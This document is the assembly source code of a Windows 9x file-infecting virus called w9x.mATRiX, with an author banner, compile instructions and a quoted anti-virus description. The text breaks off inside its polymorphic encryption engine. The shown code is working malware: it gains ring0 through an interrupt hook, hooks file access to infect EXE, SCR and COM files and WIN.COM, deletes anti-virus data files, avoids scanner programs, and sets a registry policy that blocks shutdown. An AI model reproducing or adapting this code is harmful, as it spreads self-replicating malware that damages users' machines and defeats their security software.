Matrix has you... / w9x.mATRiX'; like in the movie (except the last sentence, w9x.mATRiX:); when the day is equal to the month (1 jan, 2 feb,etc.);; the other payload will remove the shutdown command from; the start menu using the regi stery - at 06 april.;; KnownBugs : No I know... I tested this co de a lot, and a friend of me; : infected his own PC accidentl y and it worked really good; :)... The only problem is tha t F-prot hangs on infected; files... hehe but that's not my problem :);; Thanx to : Lord Julus, Billy Belcebu & Z0 MBiE.;; Greets to : Ruzz', Kamaileon, z3r0, Bhunji , Dageshi, all other Shadow-
; VX members, ; r-, GigaByte, VirusBuster, Cyb erYoda, T00fic, all other; people i met on #virus & #vir, and 29A & iKX for their; nice magazines.;; and some non-virus greets:;; Ghostie :P, Hampy, nog wat XXX Clan'ers, DJ Accelerator,; King Smozzeboss SMOS from Cone head SMOS games [NL1SMS]; PiepPiep, NL0JBL, BlueLIVE, Mi sterE & Xistence.;; Compile: Tasm32 /m3 /ml LiFEwiRE.ASM,; tlink32 /Tpe /aa /c LiFEwiRE.O BJ,,,import32.lib; pewrsec LiFEwiRE.EXE;; Contact: [email protected];;;úÄÍÄÍÍÍÍÄÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÄúÄÍÍÍÍÍÍÍÍÍ ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÄÍÍÍÄÍÄ ú ÿ;;Description at www.viruslist.com;;Win95.Matrix;;;It is not a dangerous memory resident polymorphic parasitic Win9x virus. It;stays in the Windows memory as a device driver (Vx D) by switching from;application mode to Windows kernel (Ring3->Ring0), hooks disk files access;functions, and infect PE executable files with EXE and SCR file name;extensions, and affects DOS COM files.;;While infecting a PE EXE file the virus encrypts i tself and writes to the;file end. The virus also patches program's startup code with a short routine;that passes control to main virus code.;;While affecting DOS COM files the virus writes to the end of file a short;routine that has no infection abilities, but just displays a message on;July 7th:;; Wake up, Neo...; The Matrix has you...; w9x.mATRiX;;The virus also affects the C:\WINDOWS\WIN.COM file in the same way.;;On April 6th the virus modifies the system registr y key:;;HKCU\Software\Microsoft\Windows\CurrentVersion\Pol icies\Explorer NoClose = 1;;As the result of this key a user cannot switch off the computer.;;The virus also deletes anti-virus data files: AVP. CRC, ANTI-VIR.DAT, IVB.NTZ,;CHKLIST.MS.;;The virus contains the text strings:;;[- comment from LiFEwiRE- AV'ers forgot to put the strings here??];;where 'xxxxxxx' is the virus' "generation" number.;;;úÄÍÄÍÍÍÍÄÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÄúÄÍÍÍÍÍÍÍÍÍ ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÄÍÍÍÄÍÄ ú ÿ
.486p
.model flatlocalsjumps
extrn ExitProcess : PROC; ;only 4 first gen.
;----- -[Equ's]- ---------------------------------- --------------------------;
debug equ 1 ;test/debug version?
virusz equ offset end - offset startsectionflags equ 00000020h or 80000000h or 20000000h
if debug eq 1inthook equ 05h ;let's hook this int for ring0
elseinthook equ 03h ;let's hook this int for ring0
endif
JmpToCodesz equ offset EndJmpToCode- offset JmpToCode
IFSMgr equ 0040h ;for VxDCallInstallFileSystemApiHook equ 067h ;used in ring0 hookerUniToBCSPath equ 041h ;used in hook to convert uni2ansiRing0_FileIO equ 032h ;for all file i/o
IFSFN_FILEATTRIB equ 21h ;hooked functionsIFSFN_OPEN equ 24hIFSFN_RENAME equ 25h
R0_OPENCREATFILE equ 0D500h ;used with ring0_fileIOR0_CLOSEFILE equ 0D700hR0_WRITEFILE equ 0D601hR0_READFILE equ 0D600hR0_GETFILESIZE equ 0D800hR0_FILEATTRIBUTES equ 04300hGET_ATTRIBUTES equ 00hSET_ATTRIBUTES equ 01hR0_DELETEFILE equ 04100h
PC_STATIC equ 20000000h ;for allocating pagesPC_WRITEABLE equ 00020000h ;and protecting them fromPC_USER equ 00040000h ;ring3 codePAGEZEROINIT equ 00000001hPAGEFIXED equ 00000008hPG_SYS equ 1
Get_DDB equ 0146h ;VMMCall to find S-ICE
PageAllocate equ 0053hPageModifyPermissions equ 0133h
SizeInPages equ ( virusz +1000 + 4095 ) / 4096
RegOpenKey equ 0148h ;used by payload for registeryRegSetValueEx equ 0152h ;modifyingHKEY_CURRENT_USER equ 80000001h ;REG_DWORD equ 4 ;
debug_beep_FREQ equ 1700 ;for debugging
debug_beep_DELAY equ 50* 65536
debug_beep_FREQ2 equ 700 ;for debuggingdebug_beep_DELAY2 equ 100* 65536
;----- -[Macro's]- -------------------------------- --------------------------;
VxDCall macro vxd_id , service_idint 20hdw service_iddw vxd_idendm
VMMCall macro service_id ;Is just less work than doingint 20h ;a VxDCall VMM, servicedw service_iddw 0001hendm
if debug eq 1; display "Debug Version"
elsedisplay " °±²Û *Warning* This is the real version of the vi rus Û²±°"
endif
;----- -[Code]- ----------------------------------- --------------------------;_CODE segment dword use32 public 'CODE'
start :pushad
call getdeltagetdelta :
pop ebpsub ebp , offset getdelta
sub eax , 00001000h ;Get imagebase at runtimenewEIP equ $- 4
mov dword ptr [ imagebase +ebp ], eax
pushad
call setupSEHandKillEmu ;The call pushes the offset
mov esp ,[ esp +8] ;Error gives us old ESP
jmp backtocode
setupSEHandKillEmu :xor edx , edx ;fs:[edx] = smaller then fs:[0]push dword ptr fs :[ edx ] ;Push original SEH handlermov fs :[ edx ], esp ;And put the new one (locateddec byte ptr cs :[ edx ] ;make error & let our SEH take
;control (not nice 4 emu's:)backtocode :
pop dword ptr fs :[ 0]pop edx ;pops EIP pushed by call setupSEH
popad
call SetupSEH ;to kill errors
;if eip gets here an error has occured
mov esp ,[ esp +8] ;contains old ESP
jmp RestoreSEH ;...
SetupSEH:xor edx , edx ;we are save now, if an errorpush dword ptr fs :[ edx ] ;occure EIP will be at themov fs :[ edx ], esp ;code after SetupSEH
push edxsidt fword ptr [ esp - 2] ;'push' int tablepop edx ;restore stack from call and
;edx contains pointer to IDT
add edx ,( inthook * 8)+ 4 ;Get int vector
mov ebx ,dword ptr [ edx ]mov bx ,word ptr [ edx - 4]
lea edi ,dword ptr [ ebp+Inthandler ] ;routine to let int point to
mov word ptr [ edx - 4], dishr edi , 16 ;high/low wordmov word ptr [ edx +2], di
int inthook ;call int, int will be ring0!
mov word ptr [ edx - 4], bx ;Restore old interrupt valuesshr ebx , 16mov word ptr [ edx +2], bx
RestoreSEH :
xor edx , edxpop dword ptr fs :[ edx ]pop edx ;pops offset pushed by CALL
mov edi ,dword ptr [ imagebase +ebp ] ;--- Restore old bytes ---;add edi ,dword ptr [ base +ebp ] ;do at it ring0 to avoid
;page errorzlea esi ,[ offset oldbytes +ebp ]mov ecx , JmpToCodeszrep movsb ;restore bytes from host
popad
mov eax , 00h ;--- return to host ---;imagebase equ $- 4
add eax , offset host - 0400000h ;1st genbase equ $- 4
push eaxret
;-------------------------------------------------- --------------------------;; **** RING0 LOADER ****;-------------------------------------------------- --------------------------;Inthandler :
pushad
mov eax , 0bff70404h ;already loaded?cmp dword ptr [ eax ], eaxje back2ring3mov dword ptr [ eax ], eax
push PAGEFIXED + PAGEZEROINITxor eax , eaxpush eax ;PhysAddrpush eax ;maxPhyspush eax ;minPhyspush eax ;Alignpush eax ;handle of VM = 0 if PG_SYSpush PG_SYS ;allocate memory in system areapush SizeInPages * 2 ;nPages
VxD1V equ 00010053hVxD1: VMMCall PageAllocate
add esp , 8* 4
or eax , eax ;eax = place in memjz back2ring3 ;if zero error :(
mov edi , eax ;set (e)destination
push eax
push edilea esi ,[ offset start +ebp ] ;set sourcemov ecx , virusz ;virussizecld ;you never know with poly :)
rep movsb ;copy virus to allocated mempop edi
mov dword ptr [ edi +delta - start ], edi
lea ecx ,[ edi +offset hook - offset start ] ;Install FileSystem Hookpush ecx
VxD2V equ InstallFileSystemApiHook +256* 256* IFSMgrVxD2: VxDCall IFSMgr , InstallFileSystemApiHook
pop ecx
mov [ edi +nexthook - start ], eax
pop eax
push PC_STATICpush 020060000h ;new paging settingspush SizeInPages * 2shr eax , 12push eax
VxD5V equ 00010133hVxD5: VMMCall PageModifyPermissions
add esp , 4* 4
call CheckThePayloadDate ;(and mayB do something:)
if debug eq 1call debug_beep2
endif
back2ring3 :
if debug eq 1call debug_beep
endif
popadiretd ;exit int (to ring3!)
;-------------------------------------------------- --------------------------;
host :oldbytes :
Push 0Call ExitProcessdb JmpToCodesz - 5 dup ( 176d )
;-------------------------------------------------- --------------------------;; **** FILESYSTEM HOOK ****;-------------------------------------------------- --------------------------;
hook :push ebpmov ebp , esp
sub esp , 20h
push ebxpush esipush edi
db 0bfh ;mov edi,DeltaInMemdelta dd 0
cmp dword ptr [ busy - start +edi ], not "BuSY" ;...are we busy?je back
if debug eq 1cmp dword ptr [ death - start +edi ], 'TRUE'je back
endif
mov eax ,dword ptr [ ebp+0Ch] ;EAX = Functionnot eax
cmp eax , not IFSFN_OPEN ;File Open? try itjz infect
cmp eax , not IFSFN_RENAME ;Rename? try itjz infect
cmp eax , not IFSFN_FILEATTRIB ;File Attributes? try itjz infect
back :mov eax ,[ ebp+28] ; call the old
push eaxmov eax ,[ ebp+24]push eaxmov eax ,[ ebp+20]push eaxmov eax ,[ ebp+16]push eaxmov eax ,[ ebp+12]push eaxmov eax ,[ ebp+8]
push eax
db 0b8hnexthook dd 0
call [ eax ]
add esp , 6* 4
pop edipop esipop ebx
leaveret
;-------------------------------------------------- --------------------------;; **** SOME CHECKS BEFORE INFECTING *** *;-------------------------------------------------- --------------------------;
infect :pushad
if debug eq 1mov eax , 0bff70400hmov eax ,dword ptr [ eax ]or eax , eaxjz stayalive ;kill ourself?
mov dword ptr [ edi +death - start ], 'TRUE'
call debug_beepcall debug_beep2call debug_beep2call debug_beep2call debug_beep
mov eax , 0bff70400h
xor edx , edxmov dword ptr [ eax ], edxmov dword ptr [ eax +4], edx
stayalive :
endif
mov dword ptr [ busy - start +edi ], not 'BuSY'
lea esi , [ edi +filename - start ] ;file buffer
mov eax , dword ptr [ ebp+16]cmp al , 0ffh ;no drive defined?je nopathadd al , 40h ;a=1,b=2,a+40h='A',b+40h='B'mov byte ptr [ esi ], almov word ptr [ esi +1], ':'add esi , 2
nopath :xor eax , eaxpush eax ;push 0 ;BCS/WANSIinc ah ;ax=100hpush eax ;push 100h ;buf sizemov eax ,[ ebp+28]
mov eax ,[ eax +12]add eax , 4push eax ;filenamepush esi ;destination (buffer)
VxD3V equ UniToBCSPath +256* 256* IFSMgrVxD3: VxDCall IFSMgr , UniToBCSPath ;Convert to ASCII
add esp , 4* 4 ;restore stackadd esi , eax ;eax = lenghtmov byte ptr [ esi ], 0 ;make ASCIIZ
mov eax ,dword ptr [ esi - 4]
not eax ;cmp eax , not 'EXE.' ;normal exe?je infectit
cmp eax , not 'RCS.' ;screensaver?je infectit
cmp eax , not 'MOC.' ;a com? (indeed !!:)jne nocomfilejmp payloadinfector
nocomfile :
quitinfect :
mov dword ptr [ busy - start +edi ], eax ;hope eax <> 'busy' :)popad
jmp back
db "<w9x.mATRiX."db virusz / 1000 mod 10+'0'db virusz / 0100 mod 10+'0'db virusz / 0010 mod 10+'0'db virusz / 0001 mod 10+'0' , "."counter db "0001086 & MyLittlePoly." ;enough space for counter :)db polysz / 1000 mod 10+'0'db polysz / 0100 mod 10+'0'db polysz / 0010 mod 10+'0'db polysz / 0001 mod 10+'0'
if debug eq 1db " Debug Version"endif
db " by LiFEwiRE [sHAD0WvX]>"
dontinfect : ;when attrs. were already modifiedpop esi ;get attribs + 1 = setpop ecx ;old attrspop eax ;pointer to buffer with filen.call R0_FileIO ;RESTORE ATTRIBUTESjmp quitinfect
cryptkey dd 0cryptkey2 dw 0
;-------------------------------------------------- --------------------------;; **** REAL PE INFECTION PART ****;-------------------------------------------------- --------------------------;
infectit :
lea esi , [ edi +filename - start ]
call checknamejc quitinfect ;if name = bad
if debug eq 1cmp word ptr [ esi ], ":D"jne quitinfect
endif
mov eax , R0_FILEATTRIBUTES + GET_ATTRIBUTESpush eaxcall R0_FileIO
pop eaxinc eax ;eax=4300+1 = setpush eaxpush ecx ;save attribspush esi ;and esi,no new LEA neededxor ecx , ecx ;new attrcall R0_FileIO
xor ecx , ecx ;ecx=0mov edx , ecx ;inc edx ;edx=1mov ebx , edx ;inc ebx ;ebx=2mov eax , R0_OPENCREATFILEcall R0_FileIOjc dontinfect
mov ebx , eax ;file handle
lea esi ,[ edi +pointertope - start ] ;read pointer to PE at 3chmov ecx , 4 ;into pointertopemov edx , 03chmov eax , R0_READFILEcall R0_FileIO
lea esi ,[ edi +peheader - start ] ;peheader buffermov ecx , 1024 ;1024 bytesmov edx ,dword ptr [ edi +pointertope - start ] ;pointer to pe headermov eax , R0_READFILE ;...call R0_FileIO
cmp word ptr [ esi ], 'EP' ;is pe?jne nope ;nope, its noPE :)
mov eax , 0badc0deh ;already infected?cmp dword ptr [ esi +4ch ], eax ;4ch = reservedje nopemov dword ptr [ esi +4ch ], eax
push ebppush edipush ebx ;save handle for after calcs.
mov ebp , edi
mov edi , esiadd esi , 18h ;esi+18h=start of OptionalHeaderadd si ,word ptr [ esi +14h - 18h ] ;esi-4 = pe/0/0+14h = size OH
;optionalheader+size=allocation table
;edi = PE/0/0, esi = allocation table
push esixor ecx , ecxmov cx ,word ptr [ edi +6] ;put in ecx nr. of sectionsxor eax , eax ;startvalue of eaxpush cx ;
sectionsearch :cmp dword ptr [ esi +14h ], eax ;is it the highest?jb lower ;nomov ebx , ecx ;remember section nr.mov eax ,dword ptr [ esi +14h ] ;and remember value
lower :add esi , 28h ;steps of 28hloop sectionsearchpop cx
sub ecx , ebx
mov eax , 28h ;multiply with section lengthmul ecxpop esiadd esi , eax ;esi points now to section header
; Section header layout, Tdump names things othe r (4 example rawdata);;esi+0h 8h Section's name (.reloc, .idata , .LiFEwiRE); 8h 4h VirtualSize; 0ch 4h RelativeVirtualAdress; 10h 4h SizeOfRawData; 14h 4h PointerToRawData; 18h 4h PointerToRelocations; 1ch 4h PointerToLinenumbers; 20h 2h NumberOfRelocations; 22h 2h NumberOfLinenumbers; 24h 4h Characteristics
; ESI points to Section header, EDI points to PE
or [ esi +24h ], sectionflags ; Update section's flagz
mov edx ,[ esi +10h ] ; EDX = SizeOfRawDatamov eax , edx ; EAX = SizeOfRawDataadd edx ,[ esi +0Ch] ; EDX = New EIPadd eax ,[ esi +14h ] ; EAX = Where append viruspush eax ; Save it
push esi
add eax ,[ esi +0Ch]mov [ edi +50h ], eax
mov eax ,[ edi +28h ] ;backup entry RVAmov dword ptr [ ebp+base - start ], eax ;...mov dword ptr [ ebp+newEIP - start ], edx ;save it
add edx ,dword ptr [ edi +34h ] ;edx=neweip+imagebase
mov dword ptr [ ebp+distance - start ], edx ; Store the address
mov esi , ediadd esi , 18h ;esi+18h=start of OptionalHeaderadd si ,word ptr [ esi +14h - 18h ] ;esi-4 = pe/0/0+14h = size OH
;ESI points to the allocation table,EDI to PE
;lets find the section which contains the RVA.
;then the place where to put the jump is entry-rva+ phys.
sub esi , 28h
look : add esi , 28hmov edx , eax ;Old EntryPoint (RVA)sub edx ,dword ptr [ esi +0Ch] ;VirtualAddrescmp edx ,dword ptr [ esi +08h ] ;VirtualSizejae look
sub eax ,dword ptr [ esi +0ch ] ;sub RVAadd eax ,dword ptr [ esi +14h ] ;add PhysicalOffset
;EAX is now the PhysicalOffset;of the EntryPoint
or [ esi +24h ], sectionflags ; Update section's flagz
pop esipop edxpop ebx
push edx ;push esipush eax
lea esi ,[ ebp+oldbytes - start ] ;read pointer to PE at 3chmov ecx , JmpToCodesz ;into pointertopemov edx , eaxmov eax , R0_READFILEcall R0_FileIO
mov word ptr [ ebp+randombla - start ], ax ;random value
pop edx ;and write new bytes at entrylea esi ,[ ebp+JmpToCode- start ] ;point to make code jmp tomov eax , R0_WRITEFILE ;the section which containsmov ecx , JmpToCodesz ;the viruscode (modifying thecall R0_FileIO ;entry RVA will alert AV's)
call VxDPatch ;unpatch VxDCalls (and VMM)
call IncCounter ;a ASCII counter rules
call encrypt ;encrypt,createpoly,returnsize (in ecx)
;encrypt-^ returns the virus size in ecx
mov eax , ecxmov ecx ,[ edi +3Ch] ;ECX = Alignment
push edx ; Alignxor edx , edxpush eaxdiv ecxpop eaxsub ecx , edxadd eax , ecxpop edxmov ecx , eax ;aligned size to append
pop esi
add [ esi +10h ], eax ; Size of rawdatamov eax ,[ esi +10h ] ; add [ esi +08h ], eax ; & virtual size
pop edxpush edilea esi ,[ ebp+viruscopy - start ] ;polymorfer returns size in mov eax , R0_WRITEFILE ;the ECX registerpush eaxcall R0_FileIO ;append virus
pop eaxpop esimov ecx , 1024mov edx ,[ ebp+pointertope - start ]call R0_FileIO ;overwrite PE header
pop edipop ebp
nope :mov eax , R0_CLOSEFILEcall R0_FileIO
if debug eq 1call debug_beep
endif
call killAVfilescall infectwindotcom ;for payload
jmp dontinfect
windotcom db "C:\WINDOWS\WIN.COM" , 0h ;for payloadsizewdc equ $- offset windotcom
avpcrc db 9, "AVP.CRC" , 0hantivirdat db 14, "ANTI-VIR.DAT" , 0hivbntz db 9, "IVB.NTZ" , 0hchklistms db 12, "CHKLIST.MS" , 0h
killAVfiles :pushad
;first add the path to the filenamemov ebp , edi
lea edx ,[ offset avpcrc - start +ebp ]
mov ecx , 4killing :
call killthisfilexor ebx , ebxmov bl ,byte ptr [ edx ]add edx , ebxloop killing
popad
ret
killthisfile :pushadlea edi ,[ offset filename - start +ebp ]push edi
mov al , '.'cldscasb ;search from left to right for the dotjne $- 1
stdmov al , '\' ;search from right to left for the \
scasbjne $- 1
xor ecx , ecx
inc edi ;edi pointed to char before \ inc edi ;edi pointed to \
cld
mov esi , edxlodsbmov cl , al
rep movsb
pop esimov eax , R0_DELETEFILEmov ecx , 2027hcall R0_FileIOpopadret
;-------------------------------------------------- ------------------------; **** MODIFIES COM FILES FOR PAYLOAD, SPE CIAL FOR WIN.COM ***;-------------------------------------------------- ------------------------
infectwindotcomflag db 0h
infectwindotcom : ;called if virus is not residentpushadmov byte ptr [ edi +offset infectwindotcomflag - start ], '!'
push edi
lea esi ,[ offset windotcom - start +edi ]lea edi ,[ offset filename - start +edi ]mov ecx , sizewdccld
rep movsb
pop edi
jmp payloadinfector
backfrominfecting :
mov byte ptr [ edi +offset infectwindotcomflag - start ], 173d ;-popadret
;-------------------------------------------------- ------------------------
jmpop dw 0e990h ;nop & jmpjmpval dw ?
;-------------------------------------------------- ------------------------
payloadinfector :if debug eq 1
cmp dword ptr [ esi - 8], 'PRUB' ;*BURP.COM ?jne wegvancom
endif
lea esi , [ edi +filename - start ]
xor ecx , ecx ;ecx=0mov edx , ecx ;inc edx ;edx=1mov ebx , edx ;inc ebx ;ebx=2mov eax , R0_OPENCREATFILEcall R0_FileIOjc wegvancom
mov ebx , eax ;file handle
lea esi ,[ edi +first4bts - start ] ;read first 4 bytesmov ecx , 4xor edx , edxmov eax , R0_READFILEcall R0_FileIO
cmp word ptr [ edi +first4bts - start ], 'ZM' ;a renamed EXE ??je closecomfile
cmp word ptr [ edi +first4bts - start ], 0e990h ;already infected?je closecomfile
mov eax , R0_GETFILESIZEcall R0_FileIO ;get it's size
cmp eax , 0ffffh - 0100h - dospayloadsize ;infectable?ja closecomfile
push eax
sub eax , 4mov word ptr [ edi +jmpval - start ], ax ;distance to jmp
lea esi ,[ edi +offset jmpop - start ] ;Write new jMP at 0hmov eax , R0_WRITEFILEmov ecx , 4
xor edx , edxpush eaxcall R0_FileIO
pop eaxpop edx ;place to appendpush edxlea esi ,[ edi +offset dospayload - start ]mov ecx , dospayloadsizecall R0_FileIO
pop edx ;read 7 bytes before the endpush edxsub edx , 7mov ecx , 7mov eax , R0_READFILElea esi ,[ edi +offset filename - start ] ;just a buffercall R0_FileIO
pop edx
cmp word ptr [ edi +offset filename - start +3], 'SN' ;ENUNS? (ENU isjne closecomfile ;optional)
add word ptr [ edi +offset filename - start +5], dospayloadsize +7
mov ecx , 7
lea esi ,[ edi +offset filename - start ]mov eax , R0_WRITEFILEadd edx , dospayloadsizecall R0_FileIO ;append updated ENUNS
closecomfile :mov eax , R0_CLOSEFILEcall R0_FileIO
wegvancom:
if debug eq 1call debug_beep
endif
cmp byte ptr [ edi +offset infectwindotcomflag - start ], '!'je backfrominfecting
jmp quitinfect
;-------------------------------------------------- ------------------------
;-------------------------------------------------- ------------------------; *** BEEPS used if debug equ 1 ***;-------------------------------------------------- ------------------------
if debug eq 1debug_beep :
push eaxpush ecx
mov eax , 0bff70408h
cmp byte ptr [ eax ], 0jne geenirritantgebiepvandaag
mov al , 0B6hout 43h , al
mov al , ( 12345678h / debug_beep_FREQ) and 255out 42h , almov al , (( 12345678h / debug_beep_FREQ) shr 16) and 255out 42h , al
in al , 61hor al , 3out 61h , al
mov ecx , debug_beep_DELAYloop $
in al , 61hand al , not 3out 61h , al
pop ecxpop eaxret
debug_beep2 :push eaxpush ecx
mov al , 0B6hout 43h , al
mov al , ( 12345678h / debug_beep_FREQ2 ) and 255out 42h , almov al , (( 12345678h / debug_beep_FREQ2 ) shr 16) and 255out 42h , al
in al , 61hor al , 3out 61h , al
mov ecx , debug_beep_DELAY2loop $
in al , 61hand al , not 3out 61h , al
geenirritantgebiepvandaag : ;blaa dit versta jij toch niet looser :P
pop ecxpop eaxret
endif
;-------------------------------------------------- ------------------------; File IO function, called lot of times, bett er for patching callback;-------------------------------------------------- ------------------------
R0_FileIO :VxD4V equ Ring0_FileIO +256* 256* IFSMgr
VxD4: VxDCall IFSMgr , Ring0_FileIOret
;-------------------------------------------------- ------------------------
;-------------------------------------------------- ------------------------; Increases the ASCII counter of infections;-------------------------------------------------- ------------------------
IncCounter : ;counts a ASCII counter... when there are more than;9999999 files infected it contains a bug, but i do n't
lea esi ,[ offset counter - start +6+ebp ] ;expect that from this vir :)
next :inc byte ptr [ esi ]cmp byte ptr [ esi ], '9' +1jb okmov byte ptr [ esi ], '0'dec esijmp next
ok :ret
;-------------------------------------------------- ------------------------
;-------------------------------------------------- ----------------------------; Some things used in the registery payload;-------------------------------------------------- ----------------------------
KeyOfPolicies db "Software\Microsoft\Windows\CurrentVersion\Policies \Explorer" , 0hvaluename1 db "NoClose" , 0h ;no shutdown :)ValueToSet dd 1h
CheckThePayloadDate :
mov al , 07h ;Get dayout 70h , al ;(returns it in hex btw!)in al , 71h
cmp al , 06h ;Is it 6th?jnz noPayload
mov al , 08h ;Get monthout 70h , al ;(returns it in hex btw!)in al , 71h
cmp al , 04h ;Is it 4th?jnz noPayload ;(
lea eax ,[ offset pointertope +ebp ] ;just a bufferpush eaxlea eax ,[ offset KeyOfPolicies +ebp ] ;open this keypush eaxpush HKEY_CURRENT_USER ;
VxD6V equ RegOpenKey+256* 256* 1VxD6: VMMCall RegOpenKey
add esp , 3* 4 ;reset stackpointer
push 4 ;length of valuelea eax ,[ offset ValueToSet +ebp ] ;set value truepush eaxpush REG_DWORD ;typepush 0 ;reservedlea eax ,[ offset valuename1 +ebp ]push eaxpush [ pointertope +ebp ] ;handle
VxD7V equ RegSetValueEx +256* 256* 1 ;1 = VMMVxD7: VMMCall RegSetValueEx
add esp , 6* 4
noPayload :ret
;-------------------------------------------------- ------------------------
;-------------------------------------------------- ------------------------; Patches the VxDCalls (on execute windows mo difies them to a real call);-------------------------------------------------- ------------------------
VxDPatch :pushadmov bx , 020cdh ;int 20 used by VxDCall
mov word ptr [ VxD1- start +ebp ], bx ;int 20mov dword ptr [ VxD1- start +ebp+2], VxD1V ;dd with IFSMGR & fn.
mov word ptr [ VxD2- start +ebp ], bxmov dword ptr [ VxD2- start +ebp+2], VxD2V
mov word ptr [ VxD3- start +ebp ], bxmov dword ptr [ VxD3- start +ebp+2], VxD3V
mov word ptr [ VxD4- start +ebp ], bxmov dword ptr [ VxD4- start +ebp+2], VxD4V
mov word ptr [ VxD5- start +ebp ], bxmov dword ptr [ VxD5- start +ebp+2], VxD5V
mov word ptr [ VxD6- start +ebp ], bxmov dword ptr [ VxD6- start +ebp+2], VxD6V
mov word ptr [ VxD7- start +ebp ], bxmov dword ptr [ VxD7- start +ebp+2], VxD7V
popadret
;-------------------------------------------------- ------------------------
rnd32_seed dd 0h
;------ this code is putted at EIP of host and jmps to virus code -----------;JmpToCode:
stcdb 066h , 0fh , 083h ;jnc
randombla dw ? ;some place
mov eax , 12345678hdistance equ $- 4
push eaxret
EndJmpToCode:;-------------------------------------------------- --------------------------;
;this sweet code will be appended to .com files (23 4 / 0eah bytes large)
dospayload label bytedb 0e8h , 09h , 00h , 0ebh , 012h , 08bh , 0ech , 083h , 0c4h , 020h , 0ebh , 04h , 0ebhdb 0fch , 0cdh , 021h , 0e8h , 02ch , 00h , 0ebh , 0eeh , 0e2h , 0f9h , 058h , 08bhdb 0ech , 02dh , 03h , 01h , 0fbh , 095h , 0b4h , 04ch , 080h , 0ech , 022h , 0cdh , 021hdb 080h , 0feh , 07h , 075h , 05h , 080h , 0fah , 07h , 074h , 017h , 0beh , 0eah , 01hdb 03h , 0f5h , 0bfh , 00h , 01h , 0a5h , 0a5h , 0b8h , 00h , 01h , 050h , 0c3h , 0ebhdb 05h , 0b8h , 00h , 04ch , 0cdh , 021h , 0c3h , 0beh , 058h , 01h , 03h , 0f5h , 08bhdb 0feh , 0b9h , 092h , 00h , 0fch , 0ach , 0f6h , 0d8h , 0aah , 0e2h , 0fah , 018hdb 07dh , 00h , 098h , 00h , 048h , 0f9h , 047h , 0f6h , 00h , 018h , 08dh , 00h , 042hdb 070h , 0ffh , 0fdh , 0bh , 018h , 0a8h , 00h , 018h , 0abh , 00h , 047h , 0d4h , 0ffhdb 018h , 09eh , 00h , 018h , 0b4h , 00h , 06h , 015h , 02h , 0a0h , 04ch , 0d4h , 033hdb 0dfh , 076h , 026h , 04ch , 0d4h , 033h , 0dfh , 0d6h , 02dh , 080h , 06h , 0echdb 08eh , 0bh , 09fh , 03dh , 0a9h , 09fh , 095h , 09bh , 0e0h , 08bh , 090h , 0d4hdb 0e0h , 0b2h , 09bh , 091h , 0d2h , 0d2h , 0d2h , 00h , 0ach , 098h , 09bh , 0e0hdb 0b3h , 09fh , 08ch , 08eh , 097h , 088h , 0e0h , 098h , 09fh , 08dh , 0e0h , 087hdb 091h , 08bh , 0d2h , 0d2h , 0d2h , 00h , 089h , 0c7h , 088h , 0d2h , 093h , 0bfhdb 0ach , 0aeh , 097h , 0a8h , 0e0h , 0adh , 0aah , 0a8h , 00h , 018h , 0eah , 00h , 0cdhdb 01h , 04ch , 0f6h , 054h , 055h , 018h , 055h , 01h , 0f6h , 040h , 08bh , 09h , 047hdb 0e2h , 00h , 018h , 05fh , 01h , 01eh , 05h , 03dh , 048h , 0fdh , 00h , 033h , 0f0hdb 04ch , 0ffh , 04bh , 0e0h , 033h , 0f0h , 03dh
first4bts dd ? ;the first 4 overwritten bytes from the hostdospayloadsize equ $- offset dospayload
badnames label bytedb 04h , "_AVP" ;_AVP filesdb 03h , "NAV" ;Norton AVdb 02h , "TB" ;Tbscan, Tbav32, whole shitdb 02h , "F-" ;F-Protdb 03h , "PAV" ;Panda AVdb 03h , "DRW" ;Doc. Webdb 04h , "DSAV" ;Doc. Salomondb 03h , "NOD" ;NodIcedb 03h , "SCA" ;SCANdb 05h , "NUKEN" ;Nukenabber? (error with infecting)db 04h , "YAPS" ;YetAnotherPortScanner (selfcheck)db 03h , "HL." ;HalfLife (thx to Ghostie!)db 04h , "MIRC" ;mIRC = strangedb 0h
;-------------------------------------------------- ------------------------; * Checks the name of the file to be infecte d;-------------------------------------------------- ------------------------
checkname : ;check for some bad namespushad
mov ebp , edi ;deltamov edi , esi ;points to filename
mov al , '.'cldscasb ;search from left to right for the dotjne $- 1
stdmov al , '\' ;search from right to left for the \
scasbjne $- 1
inc edi ;edi pointed to char before \ inc edi ;edi pointed to \
cld
lea esi ,[ offset badnames+ebp - start ]
checkname2 :xor eax , eax ;for load ALlodsb ;size of string in alor al , aljz diditmov ecx , eax ;counter for bytespush edi ;save pointer to filename
rep cmpsb ;compare stringbytepop edijz ArghItIsAshitFileadd esi , ecxjmp checkname2
ArghItIsAshitFile :popadstcret
didit :popadclcret
;-------------------------------------------------- ------------------------
;-------------------------------------------------- ------------------------; *** POLYMORFIC engine which generates decry pter & encrypts code ***;-------------------------------------------------- ------------------------
;; The generated code will look like this:;; pushad; lea RegUsedAsPointer,[eax+placewherecryptedcodest arts]; mov keyregister,randomvalue; sub keyregister,randomvalue; mov counterreg,size; again:; mov tempregister,[RegUsedAsPointer]; xor tempregister,keyregister; mov [RegUsedAsPointer],tempregister; add RegUsedAsPointer,4; dec counterreg; pushf; popf; jz exit; jmp again; exit:;;; between each instruction some random code is putt ed.
polysz equ offset polyend - offset encryptencrypt :
push eaxpush ebxpush edxpush esipush edi
lea edi ,[ offset viruscopy +ebp - start ] ;edi points to buffer
call gengarbage
;--------PUSHAD--mov al , 60h ;pushadstosb;--------MOV-----
call gengarbage
getregforoffset : ;This reg will contain the offset of codecall getrndalcmp al , 4 ;do not use ESPje getregforoffsetcmp al , 5 ;do not use EBP (!)je getregforoffset
mov ch , al ;backup register for offset code
;--LEA reg,[EAX+x]- ;leashl al , 3mov ah, 08dhxchg ah, aladd ah, 080hpush edi ;save location for patchstoswstosd ;doesn't matter what we store;------------------
call gengarbage
getregforkey : ;This reg will contain the crypt keycall getrndalcmp al , 4 ;do not use ESPje getregforkeycmp al , 1 ;do not use ECXje getregforkeycmp al , chje getregforkey
mov cl , al ;backup register
call gengarbage
;--------MOV-----add al , 0b8h ;make a MOV reg, rndvaluestosbcall get_rnd32stosd
;----------------
mov ebx , eax ;backup keymov ah, cl ;register back in ah
call gengarbage
